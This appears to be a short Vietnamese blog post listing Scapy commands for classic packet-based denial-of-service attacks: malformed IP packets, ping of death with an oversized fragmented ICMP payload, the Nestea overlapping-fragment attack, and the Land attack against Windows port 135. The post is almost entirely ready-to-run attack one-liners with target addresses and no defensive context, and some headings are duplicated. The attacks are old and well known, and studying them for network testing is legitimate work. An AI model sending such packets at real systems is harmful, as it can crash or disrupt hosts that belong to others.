các cuộc tấn công cổ điển
các gói dữ liệu không hợp lệ:
Ping of death (Muuahahah):
Nestea attack:
Land attack tấn công mặt đất (thiết kế cho Microsoft Windows):
>>> send(IP(dst="10.1.1.5", ihl=2, version=3)/ICMP())
Ping of death (Muuahahah):
>>> send( fragment(IP(dst="10.0.0.5")/ICMP()/("X"*60000)) )
Nestea attack:
>>> send(IP(dst=target, id=42, flags="MF")/UDP()/("X"*10)) >>> send(IP(dst=target, id=42, frag=48)/("X"*116)) >>> send(IP(dst=target, id=42, flags="MF")/UDP()/("X"*224))
Land attack tấn công mặt đất (thiết kế cho Microsoft Windows):
>>> send(IP(src=target,dst=target)/TCP(sport=135,dport=135))
Comments
Post a Comment